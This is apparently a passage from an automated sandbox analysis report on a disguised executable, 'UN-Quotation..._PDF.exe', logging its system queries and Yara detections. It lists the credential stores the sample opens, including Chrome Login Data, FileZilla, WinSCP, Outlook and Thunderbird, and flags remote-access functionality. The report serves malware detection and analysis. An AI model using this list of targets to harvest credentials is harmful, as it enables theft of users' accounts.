                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.510843577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000000.293458897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6936, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: Yara matchFile source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6936, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, type: UNPACKEDPE
